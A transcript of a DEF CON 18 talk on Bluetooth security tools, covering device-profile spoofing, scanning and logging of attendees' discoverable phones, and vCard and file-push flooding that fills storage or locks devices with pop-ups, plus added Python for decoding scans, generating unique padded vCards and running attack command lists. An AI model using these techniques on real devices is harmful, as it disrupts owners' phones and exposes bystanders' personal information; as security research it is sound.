Alright, so I guess I'm ready to get started. Anybody who attended my presentation yesterday knows that we are off to a terrific start, because the actual PowerPoint presentation has come up there, or the OpenOffice presentation. Yesterday I spent 10 minutes getting that done, so yes, yay to not failing.

Okay, so my presentation is Breaking Bluetooth by Being Bored. My name is Ronin, and this is DEF CON 2010, slash 18. The title comes from my research. I'm a graduate student; I'll talk about that in just a second. But the title comes from the fact that I feel like my best ideas, hacking-wise, almost always come when I'm incredibly bored. So math class is awesome, long drives are great, airplane rides. I actually developed one of these tools last year on the flight to DEF CON, because what are you going to do in there? So that's the reason behind the title.

About me: I'm a graduate student at Virginia Tech. My thesis is actually on Bluetooth security. So these are a couple of tools I've developed while doing my research, but it's a much broader scope of things. My website, where all this stuff is going to be posted, is hackfromacave.com. I'm graduating soon and looking for a job. I had to do that plug. I'm sorry, shameless plug. So if this goes well, which it already started off well, see me afterward.

Moving on to the important stuff. Bluetooth: I'm going to give just a brief overview. I'm sure most people here know it; you're in this talk because you're interested in Bluetooth. But Bluetooth is a short-range technology. So Wi-Fi generates a lot of power. Bluetooth is supposed to be basically, they call it a cable replacement. It's low power, designed perfectly for smartphones or PDAs. It creates an ad hoc piconet. So while most of us end up pairing just two devices, you can actually pair more than that in the little piconet and have devices communicate with each other. But most of the time, you're pairing a headset to a single smartphone or something like that.
But it can do more. And it's a very fast-growing technology. The Bluetooth website, and this was a couple of years ago actually, in I think 2006, posted that there are over one billion Bluetooth devices in the world right now, or Bluetooth-enabled devices. So that's a little bit of Bluetooth.

Now we're going to the fun stuff. So part of how Bluetooth communicates is that they have a Bluetooth profile. You're probably very familiar with it from the access point side of things. Wi-Fi access points have a very similar style, where you have a device address, which is the MAC address. You have a device class in this case, which describes what the device is. So it tells you if it's a phone, or if it's a phone slash smartphone. It gives you a little bit of information about the device, and the device name can be anything you want it to be.

So cloning that information is doable. And this isn't something that I created; this has been done years in the past. But all you have to do is, you know, the first two, the class and the name, are easy to do. The other one, the device address, you have to have certain chipsets. The CSR chipsets are great. You scan for a device, you get it, you can clone it. Or you could change your profile. It's the same as MAC spoofing. So if you ever do MAC spoofing, you do the same thing, where you generate a new Bluetooth profile, and now you've obfuscated who you are or what your device is.

So previously the method for doing this was just manual. I mean, you'd have to scan for a device, you'd have to manually change settings. So I created SpoofTooph as a way to automatically do a lot of these things. And it does a little bit more. So it's great for obfuscation, or impersonation: you can actually pretend to be somebody else. Or, something I didn't really intend when I wrote it, actually observing devices in range and logging that. So I'm going to go through a couple of different modes that SpoofTooph has right now.
The first one is a basic scan. So what it's doing is it's using the -i. The hci0 is like wlan0, for everybody who's Linuxy and does ifconfig. This is hciconfig, and it's got the same kind of thing. So that's the interface. And it's scanning and dumping it to the log. So basically just scanning the local area and dumping everything to the log.

I should have mentioned this before; I forgot to. Bluetooth has two modes, discoverable and non-discoverable mode. It will function in both. And this is the key for securing it: you want to have it in non-discoverable mode. The only reason to have it in discoverable is for initial pairing. So you want the two devices to connect, and once they know about each other, they have the information. They don't need to scan for each other after that. So then you turn the device to non-discoverable. So this only finds devices in discoverable mode. It's not like, you might be familiar with the tool RedFang if you're a big Bluetooth hacker, which tries to find devices that are in non-discoverable mode. This is only for discoverable-mode devices.

Okay, so moving on to mode two. Mode two is actually just a randomly generated profile. So you really want to obfuscate and you don't want to actually have to think about anything. You just type the -r flag and it creates you an entirely new profile for your device. An Easter egg that I didn't actually put in the documentation, kind of on purpose, because I wanted to release something at DEF CON: if you change from the lowercase -r to the uppercase -R, I have a list of all kinds of science fiction names instead of normal names. The previous one took the top 100 first and last names and generates from that. This will take your favorite science fiction characters, so you can be Yoda's phone, or Malcolm Reynolds' peripheral, or Bender Bending Rodriguez's audio/video device. So now you know. Mode three.
Oh, this mode is where you actually get to specify the information you want to change your device information to. So this is a little more of the manual side of things: the new name, the device address, and the device class. Not all. You can't just put anything for the device class. I mean, you could, and it'll just say unknown. So if you're going to put something in there, you know a little bit about how the device class works, which I'm not going to really go into too much today.

Mode four is, oh, it's a load of a previously logged scan. So if you want to scan, save it for later, log it, make one of the selections and then clone that device later on, you can do that.

And the last one is the incognito mode. You can have SpoofTooph randomly generate a profile every X number of seconds. So if you don't want to be seen, you can keep changing your profile. This will mess up persistent connections. So don't think you're going to be connected to something and keep changing that; it will mess it up. But if you're just running these scans or whatever, it will change your information every 10 seconds.

So this is what the interface looks like. Pretty straightforward. It will run the scan, and the devices that pop up come up in this menu. It'll list all the devices there. I'm not that great with the interface programming so far. It's similar to how the menu interface is for Kismet, except I know a lot less. So instead of having nice little arrows and stuff, you have to type in characters. So sorry about that. Maybe in a future version it will be a little slicker of an interface. So yeah, that's showing you four of the scans. You can see there's a couple of pages at the bottom. So you just do previous, next, and it will show the rest of the scans, in which I have obfuscated people's names and the addresses in this slide. But we'll show you real quick a live demo of who's in this room. All right. Can you guys hear me clicking?
Is that really loud out there? It sounds really loud up here. Okay. This is actually, I don't know if it's going to pick up, it might pick up stuff up here, because actually I'm not hooking it up to a long-range device. So Bluetooth has three different classes. Yeah, okay. Popped up, done.

One thing to note, so I'll go for the class first. The classes of devices, there's three different ones: one meter, 10 meters, 100 meters. Those are somewhat accurate numbers. So if you're looking to do anything with Bluetooth, you want to get a class 1, because that's the longer range.

So, Bluetooth scanning for this, you see that the, actually no, all these got their names. Sometimes the scans have an initial scan and then a follow-up. So you can see under, I think it's four. Yeah, device four, it says unknown. What? Oh. Yeah, sorry, that's going to, is that a little better? I know it's all blurry and it's hard to see. It's going to mess up the menu if I do it any bigger, so sorry about that. You can kind of see; it's mostly a blur. But if you notice, is it gone now? It was. Number four changed, the name changed from unknown to Red Team. Man, I'm getting a lot of stuff in here. I figured there'd be more paranoid people. It doesn't pick it up very far.

So the scanning for Bluetooth, the initial scan detects the device based on the MAC address and then does a follow-up scan for the name. So sometimes, if you're using this to do something like war driving, you will need to be in an area where you're actually going to have a persistent amount of time with the device that you're scanning, if you want to capture that information, because it takes 10 seconds to a minute to complete a scan. The initial scan is actually very, very quick, but the follow-up scan for the name takes a long time. So if you notice that things change on there or that you're not getting the name, that's the reason why.
So it's just, this only works with discoverable devices. Sorry, he asked if it was just with discoverable devices. This only works with discoverable devices.

Through this, I've actually started another project called the Bluetooth Profiling Project. It's similar to, if you're familiar with Josh Wright, he's doing a very similar project and collecting a lot more information on specific devices. I'm only looking at a little bit. So what this project is, it's trying to map the MAC address ranges of Bluetooth devices. So for those who aren't familiar, each type of device, every manufacturer gets their own, I thought I had it in the slide, I forget exactly what it's called. It's basically the first six characters in the MAC address are manufacturer-specific, and then the rest of them are randomly given to the devices. And that range is the same on all devices of a particular type. So if you can get the range of those, by keeping on scanning, you find that whatever type of phone, and you see, oh, well, there's a pattern here. I see that all these types of phones are between this and this. Then you can use something else to, oh, it will help out with other projects. Actually, I'll talk about that in just a minute.

So right now I've collected about 1,500 devices, which is surprising. It really is surprising how many devices are out there in discoverable mode, because they really shouldn't be. I listed about 1,000 of them on my website right now. I'll try to get more.

Yeah, so actually I just went into this a little bit more than on the previous slide. So yeah, using RedFang, as I mentioned, RedFang finds devices in non-discoverable mode by attempting connections, essentially. So it has to run through the entire list and it takes forever. Like, you couldn't actually run the whole gamut, and I don't know what the number is, I don't want to quote it, but it's years and years and years and years. So this will help narrow that down.
If a device, if only 1,000 models of a certain device are made and you can get that range, well, then you have a lot higher odds than whatever the possibility of MAC ranges is. The other thing is to match the model with the address.

Yeah, let's talk about a little more of the research. A big part of it that I've discovered is actually the disclosure of sensitive information. I feel like a lot of people don't realize what's being disclosed by the name of their Bluetooth-enabled device. Oh, sorry. Yeah. So we went through this just a minute ago. That's the OUI. That was the name I was looking for. This is the sensitive one. So a lot of them are giving out things like the first name, the nickname, location, device model. I've seen things like URLs actually in the name, because people name the computer the same name as its URL. So then you can see it that way. All kinds of stuff that, you know, I'm sure they don't know that that's the name of it, or that anybody walking by can just get the information.

But my findings are that about 30% of Bluetooth devices that I scan gave away an individual's first name. And that's just me going through them; I might not recognize a name off the bat, but that's roughly it. About 20% give out last names, locations. The device model, I considered that sensitive information only for exploitation purposes. So if you know what the device is, then you can target your attacks. I understand naming it that way. I'm not saying don't name the device whatever, but it is possibly sensitive information if people are going to try to exploit a particular device. You change the name to something else and, other than, as I said, figuring it out from the MAC range, it makes it very difficult to determine what the device is right off the bat.

Contributing. I'd love to have an enormous list of profiles. The more that people contribute, the better; the more accurate things will be.
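The three fields the talk keeps coming back to (address, class, name) are worth seeing decoded in code. The block below is an added example written for this page; it is not SpoofTooph or any code from the talk. It parses a constructed scan log in an invented "addr, class, name" format, splits the 24-bit Class of Device field into its major/minor device class and service bits (layout from the Bluetooth Assigned Numbers), extracts the OUI prefix that the Bluetooth Profiling Project groups by, and flags names that leak an owner's first name, a possessive ("Bob's iPhone") or a URL, sanitizing them to "other" the way the contribution guidelines ask. The first-name list and every address in the sample are constructed, not real OUI assignments.

```python
# Added example, not part of the talk or of SpoofTooph: parse a scan log of
# (address, class, name) entries, decode the Class of Device field, pull out
# the OUI, and flag device names that leak the owner's name or a URL.
import re
from collections import defaultdict

# Class of Device layout (Bluetooth Assigned Numbers, Baseband):
# bits 0-1 format, bits 2-7 minor device class, bits 8-12 major device class,
# bits 13-23 major service class.
MAJOR_DEVICE_CLASS = {
    0x00: "Miscellaneous", 0x01: "Computer", 0x02: "Phone",
    0x03: "LAN/Network Access Point", 0x04: "Audio/Video", 0x05: "Peripheral",
    0x06: "Imaging", 0x07: "Wearable", 0x08: "Toy", 0x09: "Health",
    0x1F: "Uncategorized",
}
PHONE_MINOR = {0: "Uncategorized", 1: "Cellular", 2: "Cordless", 3: "Smartphone",
               4: "Wired modem/voice gateway", 5: "Common ISDN access"}
SERVICE_BITS = {13: "Limited Discoverable", 16: "Positioning", 17: "Networking",
                18: "Rendering", 19: "Capturing", 20: "Object Transfer",
                21: "Audio", 22: "Telephony", 23: "Information"}


def decode_cod(cod):
    """Split a 24-bit CoD into format, major/minor device class and service bits."""
    major = (cod >> 8) & 0x1F
    minor = (cod >> 2) & 0x3F
    return {
        "format": cod & 0x3,
        "major": MAJOR_DEVICE_CLASS.get(major, "Unknown"),
        # Minor-class tables differ per major class; only Phone is decoded here.
        "minor": PHONE_MINOR.get(minor, "Unknown") if major == 0x02 else None,
        "services": [name for bit, name in SERVICE_BITS.items() if cod & (1 << bit)],
    }


def oui(addr):
    """Manufacturer prefix: the first three octets of the BD_ADDR."""
    return ":".join(addr.upper().split(":")[:3])


# Constructed first-name list; a real run would load a much larger one.
FIRST_NAMES = {"bob", "alice", "carol", "dave", "eve", "mallory"}
URL_RE = re.compile(r"(https?://|www\.)\S+|\b[\w-]+\.(com|net|org|edu)\b", re.I)


def leaks(name):
    """Return the kinds of personal information a device name gives away."""
    found = []
    words = re.findall(r"[A-Za-z]+", name)
    if any(w.lower() in FIRST_NAMES for w in words):
        found.append("first name")
    if re.search(r"\b\w+'s\b", name):            # e.g. "Bob's iPhone"
        found.append("possessive (owner's name)")
    if URL_RE.search(name):
        found.append("URL/hostname")
    return found


def sanitize(name):
    """Replace anything that looks like a person's name with 'other'."""
    return "other" if any(f != "URL/hostname" for f in leaks(name)) else name


def parse_log(text):
    """Constructed log format: 'addr, class-in-hex, name' per line, '#' comments."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        addr, cod, name = (f.strip() for f in line.split(",", 2))
        entries.append({"addr": addr.upper(), "cod": int(cod, 16), "name": name})
    return entries


def build_profiles(entries):
    """Group sightings by OUI and decoded class: the skeleton of a profiling list."""
    profiles = defaultdict(lambda: {"count": 0, "classes": set()})
    for e in entries:
        d = decode_cod(e["cod"])
        label = d["major"] + ("/" + d["minor"] if d["minor"] else "")
        profiles[oui(e["addr"])]["count"] += 1
        profiles[oui(e["addr"])]["classes"].add(label)
    return dict(profiles)


SAMPLE_LOG = """\
# constructed sample, not a real scan
00:11:22:33:44:55, 0x5a020c, Bob's iPhone
00:11:22:AA:BB:CC, 0x5a020c, FailPhone
00:11:22:01:02:03, 0x5a020c, Alice Smith
AA:BB:CC:00:00:01, 0x240404, Jabra BT
DE:AD:BE:EF:00:01, 0x10010c, www.example.com
"""

if __name__ == "__main__":
    for e in parse_log(SAMPLE_LOG):
        print(e["addr"], decode_cod(e["cod"])["major"], leaks(e["name"]), "->", sanitize(e["name"]))
    print(build_profiles(parse_log(SAMPLE_LOG)))
```

Feeding `0x5a020c` through `decode_cod` gives Phone/Smartphone with Networking, Capturing, Object Transfer and Telephony set, which is why the class field alone is enough to say "that's a smartphone" before the slower name lookup completes; `0x240404` decodes to an Audio/Video device advertising Rendering and Audio, a headset. The `leaks` check is deliberately crude (a word list and two regexes) because that is roughly what a human eyeballing 1,500 names does, and it is what the 30%/20% figures in the talk rest on.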
There's a couple of caveats to that. So I want the name, the address and the class. No more or less. I don't care where you got it. I don't care how you got it. Just as long as you post those three things. I want to sanitize the information. It is publicly available information, so there should be no problem with it, but just to be nice. Sanitizing things like the name: anything that looks like a name, replace it. The place information, or "other", is for the category that, if you're like, this might be sensitive, I wonder if I could ask him, just replace it with "other". It's not that important to have the name for everything except for, as I said, the statistics earlier. That's most of the reason I don't just replace the name right off the bat; it could help with some other research down the road. So I've created a forum on my website where people can just post the logs that they find, and I will update the full list as I get more posts.

So here's my nice little DEF CON list. I thought this would bring the point home. I just phrased that completely wrong. So this is just a couple of them. I've been scanning all of DEF CON. Congratulations, people do actually do hacking stuff at DEF CON. And if you thought you had turned off your Bluetooth device, I see some people in the audience right now that are like, yeah, wait, I think my phone's booted this off. But, yeah, I don't know how many clients didn't get in the list. I'm going to go with about 250 different profiles that I found here, when this wasn't even an effort I made. I didn't try to get every room or go all around. It's mostly been sitting in the Hackers for Charity booth. So if you went to the vendor area, you probably got scanned there, or walking around a little bit. So this is just a couple of them. I liked Fail Phone, clever naming. I removed the star, star, star; those are actually people's real names. And you can see what devices give those out. This is, yeah, as I said, just a couple.
So be aware that whatever you name it, if you don't know what you've named it, you're probably giving something out. I mean, if you rename it to Fail Phone, then, okay, well, obviously you took the upgrade and you know what it's going to be named. If you don't know what it's named, you might want to check that out. And I meant to say this list was inspired by the Wall of Sheep guys. So I'm going to be posting some of this stuff with them later on. So this is a short list. If you want to see whether you were scanned, you might want to check out the Wall of Sheep a little later.

So that's the obfuscation side. That's the data collection and everything like that. Now we'll get into the offensive side of things. So, a vCard. This is one of the tools that I've been working on, called vCardBlaster. A vCard is a virtual business card, essentially. You probably have used them before. A lot of places have them for download, or information on people. It works with, syncs up with, Outlook. It creates the profile. It's good for your contact list. And it's heavily used in Bluetooth. A lot of the Bluetooth-enabled phones will be able to share things over vCards, which makes things a lot easier instead of all the business cards going around. You just sync up your devices, send it over, and life is good. But some of them that allow it, sometimes it'll come up with a prompt that says, would you like to allow this vCard? And you're like, oh, yeah, sure, I just met that guy. Or, we need to pair before you can send that over. Some of them, however, don't do that for this particular feature. And I can understand why, in the development of it, they decided, oh, well, obviously, if you're just going to send a vCard over, there's nothing bad about it. But there could be. What vCardBlaster does is it allows you to send a constant stream of vCards to a particular device or to all devices in range. One, a couple of different things. Let's see, yeah.
A couple of different things this can do. One is potentially fill up the disk drive. vCards, while they can just contain email or your name or your phone number, can actually contain a lot more than that, like images. So if you could send a constant stream of vCards with very large file types, you could potentially fill up the disk of something that's a very small PDA with a very low amount of memory, or if it's partitioned memory.

The other thing is you can add contacts to people's devices. So that could be interesting, just to see what you want to add. The other thing is, actually, if you want to add a ton of random names in there, you've officially made it very hard for them to make a phone call, because if the contact list had 100 people and now it's got 10,000 people in it, they're never going to find Mom. Mom, Mom, Mom, where is it down there? And I don't know of any quick way to remove new contacts most of the time. I'm pretty sure it's a manual process. So unless they have some sort of backup of their contact list, they have to go in and manually remove all of it.

Something I'm going to be working on is actually the random name generation. So that's not in there right now, but I'm going to be adding that so it will randomly generate a name. You can't have the same name, because a lot of times they'll get angry about that and say, are you sure you want to replace this? And you don't want to make the user aware that this attack is going on. So it randomly generates and doesn't double up on the name, so you can fill it up that way, and they look like legitimate ones, because right now I just have a random string of characters, so they can pretty much tell that it's not legit.

So this is what the attack looks like. I can demo it... I can demo one, sorry, it's dead. But this is exactly what it would look like. So the flags are up there. Can you guys? You can't really see it that well. So I'll describe what it is.
It has a flag for generating, a -i 20 to say run it 20 times instead of 10,000 times. The -t has to do with the threading, to see if it times out. So it'll continue to work, or it'll freeze up, so you want to add a timeout option in there. And then just the directory; you can either select a specific vCard, or vCardBlaster will generate one for you and then send that information on. So that's pretty much what's going on here. I have a string that I gave it, Big Brother, and it's randomly generating text after that so that it won't prompt the user to replace the current contact. So this one, I wish I could show how quick it runs. Once they initially connect, it's milliseconds to copy these over. So you can fill up a contact list pretty darn quick. Yeah, the live demo thing, not going to happen.

Bluper is actually a very similar type of program. It's exactly the same, except it's not vCards, it's any other type of file. So the process for sending these files is the same. However, when it gets to the PDA side, they know that vCards are supposed to be interpreted this way, and possibly other files are interpreted in certain other ways, and then the rest of them are for download. So it's basically the same principle except... Not to single you out or anything. I'll just hold on here. Yeah, so it's the same principle, but it has a different kind of denial of service. Well, I guess it's similar to the first one I mentioned. So what it does is, I found on specific devices, actually this specific device, that what happens is normally when you just want to transfer a file, and some of you might have done this through Bluetooth before, you either need to make a connection, it says somebody wants to connect, and then you connect, and then it says, okay, now I want to transfer a file; or it says Bob is transferring a file to you, do you accept? When you click accept, it starts downloading it.
I found on a particular device it would cache the file, and then prompt the user for the download. I don't know where it would cache, because forensics on PDAs is very difficult, and I haven't actually found how it caches it or where it caches it, but it caches it nonetheless, and that's before it prompts the user that the interaction is going on. That's assuming a couple of things, like that it allows anonymous connections. So this is only one specific device that I've tested it on. It might work on a lot of others, and people don't like to give me their phones anymore for some reason.

So what you can do is, as I mentioned before, you can fill up the disk of a device with low disk space, and this one works a lot better, because with the vCard one you might have 20 lines of text you're sending. With this one you can actually generate a file of whatever size you want and send that. So you can send a specific file if you want, which is fine by me, but I thought I would just offer to randomly generate a file, because what's important here isn't the file, it's that it's causing it to fill up the disk space. So you can generate a file of 10 kilobytes or, you know, 5 gigs, if you really wanted to. Of course, 5 gigs over Bluetooth would take forever and ever and ever. Bluetooth is not designed for heavy use. You don't want to pass an ISO over Bluetooth. That generally will not go very well. It's a very low data rate compared to Wi-Fi. It's 2 megabits slash 3-ish megabits, and that's, you know, theoretical MAC stuff. So it does take a while. That's the one caveat of this attack: you really have to be next to somebody for a very, very long time. This isn't going to be very effective at a coffee shop. If you're going to be performing this attack, it's got to be a device that's there for an extended period of time, hours, maybe a day, depending on how much space there is and if the attack is effective. Oh, yeah. I put that it can cause it to crash.
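Two points in the last few paragraphs (unique names so the phone never raises its "replace this contact?" prompt, and padding each object so it eats storage) are easy to get wrong in a generator, so here is an added example of both. It is written for this page and is not vCardBlaster or Bluper code; the name pools are constructed, the PHOTO payload is random filler rather than a real image, and the vCard 3.0 layout and 75-octet line folding follow RFC 2426.

```python
# Added example, not the vCardBlaster or Bluper code: build vCard 3.0 contacts
# with guaranteed-unique display names (so the phone never asks "replace
# existing contact?") and, optionally, a PHOTO payload that bulks each card
# up to a chosen size, the disk-filling variant described above.
import base64
import os
import random

# Constructed name pools; any list of plausible names would do.
FIRST = ["Alex", "Sam", "Jordan", "Taylor", "Casey", "Morgan"]
LAST = ["Lee", "Patel", "Garcia", "Nguyen", "Brown", "Kim"]


def fold(line, width=75):
    """RFC 2426 line folding: continuation lines start with a single space."""
    out, rest = [line[:width]], line[width:]
    while rest:
        out.append(" " + rest[:width - 1])
        rest = rest[width - 1:]
    return out


def make_vcard(first, last, tel, photo_bytes=None):
    """Return one vCard 3.0 as text (CRLF line endings, as the spec requires)."""
    props = [
        "BEGIN:VCARD",
        "VERSION:3.0",
        f"N:{last};{first};;;",
        f"FN:{first} {last}",
        f"TEL;TYPE=CELL:{tel}",
    ]
    if photo_bytes is not None:
        # Inline base64 photo. The bytes are random filler, not a real JPEG;
        # what matters for the attack is the size, not the content.
        b64 = base64.b64encode(photo_bytes).decode("ascii")
        props.append("PHOTO;ENCODING=b;TYPE=JPEG:" + b64)
    props.append("END:VCARD")
    lines = []
    for p in props:
        lines.extend(fold(p))
    return "\r\n".join(lines) + "\r\n"


def parse_fn(vcard):
    """Unfold and return the FN value, i.e. what the receiving phone displays."""
    for line in vcard.replace("\r\n ", "").split("\r\n"):
        if line.startswith("FN:"):
            return line[3:]
    return None


def unique_contacts(n, seed=0):
    """Return n (first, last, tel) tuples with no repeated display name."""
    rnd = random.Random(seed)
    seen, out = set(), []
    while len(out) < n:
        first, last = rnd.choice(FIRST), rnd.choice(LAST)
        if f"{first} {last}" in seen:
            # Vary the surname instead of repeating, so no overwrite prompt fires.
            last = f"{last}-{rnd.randint(100, 999)}"
            if f"{first} {last}" in seen:
                continue
        seen.add(f"{first} {last}")
        tel = "+1555" + "".join(str(rnd.randint(0, 9)) for _ in range(7))
        out.append((first, last, tel))
    return out


def padded_vcard(first, last, tel, min_size):
    """A card of at least min_size bytes, padded with random PHOTO data."""
    # base64 turns 3 raw bytes into 4 characters, so min_size*3//4 (+3 for the
    # final partial group) raw bytes already clears min_size before headers.
    return make_vcard(first, last, tel, photo_bytes=os.urandom(min_size * 3 // 4 + 3))


if __name__ == "__main__":
    for c in unique_contacts(3):
        print(make_vcard(*c))
    print(len(padded_vcard("Alex", "Lee", "+15550000000", 10_000)), "bytes")
```

`unique_contacts` is the piece the talk says is still to be written: it dedups on the FN string the phone keys its "replace?" dialog on, and varies the surname rather than appending a bare counter so the entries still look like people. `padded_vcard` is the bridge to the Bluper idea: a contact card is a file too, and once PHOTO is inline its size is whatever you choose, with the same transfer-time caveat the talk gives for large files.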
So when I was testing this, once I accidentally hit OK, I sent a bunch of files at once. You can send one file or a lot of files, however you want to test it with the device to see what's more effective. So I started caching the files, and then it says, do you want to reject them? Do you want to say OK for this file, or do you want to download them all? And I just happened to actually accidentally click accept all. And so, long story short, it took what was in this memory, which was almost full, and it tried to write it over into the real file system. So we completely ran out of disk space. And I don't know if it ran into the memory, because a lot of these devices, their hard drive space and their RAM are actually the same physical chip, or flash, or something like that. So what happened is it actually completely fried the device and I had to do a factory reset. Which was fun. It took me forever to figure out what was going on, and it died. And then bringing it back up, it would not boot. It would not boot. So I actually had to do the manual factory reset to get that to work. So that's a nice little attack, when you completely break the system into the manual factory reset.

So this is what it looks like. I can attempt the demo over here. Yeah. Actually, I'll do the demo and then come back to see what this looks like. So to scan for a Bluetooth device in Linux: hcitool scan. You could use SpoofTooph. This is just quick and easy. The advantage over just running a script that will do this is that SpoofTooph only logs it once. So if you're doing a... Thank you. Thank you, whoever out there. It's hard to see. It says Ronin's mum. Fanboy. Thank you. Okay. So I'm sure people have been pounding on this thing, because it's a Bluetooth app and I enabled Bluetooth on this. So we're going to try to run this. Let's see. Wow. So. Sorry. Let's see if I can boost this up a little bit. That didn't do anything.
It's a little better. One more. Yeah, okay. So that's the command I'm going to run against my Dell Axim up here. I should have just copied and pasted that, like I just did. What would have been faster? Oh. I should... I need... I'm actually trying to upload a file that doesn't exist. Evil file. Wait. That's not good. Okay. Well, that didn't work at all. I don't know. I know why; I haven't updated this system. I apologize for that. But the attack would have looked exactly like this. So that's actually the system's fault. The program should work fine. I guess I should mention that a lot of these are actually generating a script internally. So that's why that failed, because I didn't include some of the code; I actually just end up bundling it into a script. The new versions that I'm working on right now will have everything in it, so you don't have to install some of these additional tools or packages. And that's the reason that failed right now.

But anyway, what I have here that's hard to see is it's going through five iterations and it's using a generated file of size 10,000. And you can select the file name, the current file name, and then you can tell it what the file name should be on the other end. So it doesn't have to be the same. So you just have to say that this is some sort of whatever file, maybe something someone would actually accept, or something that looks nonchalant. And then target the device, and you can kind of see the iterations. Each one finds the device, sends the file, and then it's done. But it does take quite a while for that size. This probably took 10 minutes to send the size of 10,000 K. So, yeah, it will take a little bit of time. And then on the other end, you can kind of see it has a little pop-up. That pop-up, you can either... So, save all, in the bottom left. That's what I clicked on. That was the downfall of the device. Imagine a user would probably notice if I send a file that says evil file.
It generates a counter too. You have that option so the files can look different, and that's how I knew how many were up there if you're testing. It makes it a lot easier, because another sort of denial of service, this kind of falls into both of them: pop-up menu denial of service. If you're sending a constant stream of files that are very small, this is another option, and they click no and it pops right back up. So unless they get away from you, they can't actually disable Bluetooth, unless there's some hardware setting, because they can't get the Start menu: they click the Start menu and that pop-up is a higher priority than the Start menu. So all you do, and this happened to me, and I was like, no, stop. Crap, I can't go over to the other side, because it kept popping up and I couldn't actually do anything on the device because of the pop-up menus. So if you really want to annoy somebody, that's a good way to do it.

Another tool I've been working on is Pwntooth. This is an attack suite, essentially. I've tried to bundle together some common Bluetooth attacks other than the ones I mentioned here. None of these are mine, but I figured I'd make a little bit of an easier way for certain people to do pen testing. There's a really good actual suite in BackTrack that's... If you're a first-time user, you want to go that route. It steps you through things. Mine does not do a step-through. What this is is it basically allows you to run a script, and it will scan for everything and only run the attacks once against it. So it's a binary file, but it could have been a script file, but it only runs the attack list once. You provide the list of attacks through the tools. So there's no point-and-click or anything; you're not just making a selection. You make this config file whatever you want, and you run those attacks against the devices. You can say one specific device, you can say all devices in range, and it'll run all those against it at a time.
I don't do any report generation. I probably won't do any report generation, maybe, possibly, but all you get is the output of the actual attack. It's not going to provide the information that says this succeeded, this failed, whatever. But it's mostly there to make... I worked on a project where I had to run a lot of attacks... Excuse me, I had to run attacks a lot of times against a device, and then I had to type in the MAC every time, and it got to be a little bit of a pain. So this is more just the automatic way to do things.

So here's the config file. The configuration file uses a star and inserts the MAC address. So a lot of them will tell you this is where the MAC address should be when you're running the command. That's basically all it really does; other than that it could just be a bash script, except that it scans and only runs once. This is the default area where the file is installed. And you can run it multiple times through, so you can say I want to actually run this script as many times as you want, and that's just an example of the specific log file that you want to log the information out to, and scanning it 10 times. So you can specify a different configuration file if you want, but this just makes your life a little bit easier if you're going to be running lots of attacks against a single device or an area of devices. If you're going to be pen testing at your business and you want to see what vulnerability is out there and you're walking around with it, this might help you out a little bit.

An example. So the pound sign is to keep a line from being read in. So the list comes with examples. It's got some default ones. And I tried to put some in there, some of the commands, because I know some of these tools, while awesome, are not as widely used. So there's not a whole lot of documentation and examples of things. So I tried to include examples of how to use them in a way that I would normally use them.
So that should help you out, if you are new to this, in getting started. So I've provided a couple of examples. You can add whatever you want; as long as you use the wildcard, it'll insert the address in there and run whatever you want. Here's a couple of project pages for the different things. And I'm up for Q&A. So, anybody? It's something I started years ago. I just decided to put it up there, and then ever since, every presentation I do has a bunny. So, yeah. Do we have any questions? Do you know what time it is? Not good. Any questions? Nobody cares? All right.

The problem with the, you have to find it when it's non-discoverable, and that's a big pain. There are actually some presentations, I think they did a great job, using a USRP to monitor the bandwidth, the frequencies, and getting it that way. But that's frequency analysis. So you can discover devices there and you might be able to pull out the MAC, and it's very complicated and long. But RedFang is a great option to find non-discoverable devices, but it takes so long it's not terribly practical.

Yeah, actually we've got some swag here. If anybody wants it, you can come on up and throw some too. Will people want this stuff? All right. I'm going to see how far I can get it out. Almost to the back. Deflected. All right. I'm going to be in room 114 if you have questions about that, or maybe about this.
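The Pwntooth config described a few paragraphs back has exactly two rules (lines starting with `#` are skipped, `*` stands for the target address) plus one behaviour (each device gets the attack list once, however many scans it shows up in). The block below is an added example of that loop, written for this page; it is not Pwntooth's code. The config is constructed: `l2ping` and `sdptool browse` are BlueZ commands used with their normal syntax, and the commented-out `bluesnarfer` line is there only to show a third-party tool dropping into the same slot, with flags quoted from memory rather than verified. The executor is swappable so the whole thing runs offline.

```python
# Added example, not Pwntooth's own code: read a config of attack command
# templates ('#' lines ignored, '*' replaced by the target BD_ADDR), then run
# the whole list exactly once per device no matter how many scans see it.
import shlex
import subprocess

# Constructed config. l2ping and sdptool are BlueZ tools; the bluesnarfer line
# is an assumed invocation (check the tool's usage) shown only for shape.
SAMPLE_CONFIG = """\
# Pwntooth-style attack list: one command per line, * = target address
l2ping -c 3 *
sdptool browse *
# commented out until you mean it
#bluesnarfer -b * -r 1-10
"""


def load_attacks(config_text):
    """Command templates, minus blank lines and '#' comments."""
    return [ln.strip() for ln in config_text.splitlines()
            if ln.strip() and not ln.strip().startswith("#")]


def expand(template, addr):
    """Put the BD_ADDR wherever the template has '*'."""
    return template.replace("*", addr)


def shell_runner(argv):
    """Default executor: run the tool and return whatever it printed."""
    done = subprocess.run(argv, capture_output=True, text=True)
    return done.stdout + done.stderr


class OnceRunner:
    """Runs every attack once per newly seen device; re-sightings are skipped."""

    def __init__(self, attacks, runner=shell_runner):
        self.attacks = attacks
        self.runner = runner           # swap in a fake for offline testing
        self.seen = set()
        self.log = []                  # (addr, command, output) triples

    def handle_scan(self, addrs):
        """Feed the addresses from one scan; return the commands actually run."""
        ran = []
        for addr in addrs:
            addr = addr.upper()
            if addr in self.seen:
                continue
            self.seen.add(addr)
            for template in self.attacks:
                cmd = expand(template, addr)
                output = self.runner(shlex.split(cmd))
                self.log.append((addr, cmd, output))
                ran.append(cmd)
        return ran


if __name__ == "__main__":
    # Offline demo with a fake executor; use shell_runner on a host with BlueZ.
    fake = lambda argv: f"[would run] {' '.join(argv)}"
    r = OnceRunner(load_attacks(SAMPLE_CONFIG), runner=fake)
    print(r.handle_scan(["00:11:22:33:44:55", "aa:bb:cc:dd:ee:ff"]))
    print(r.handle_scan(["00:11:22:33:44:55"]))   # already done: nothing runs
```

The address is normalised to upper case before the `seen` check, otherwise the same phone logged as `aa:bb:...` by one scan and `AA:BB:...` by another would be attacked twice, which is the one thing this wrapper exists to prevent. Nothing here judges success or failure; as the talk says, all you get is each tool's raw output, kept in `log` for whoever reads it afterwards.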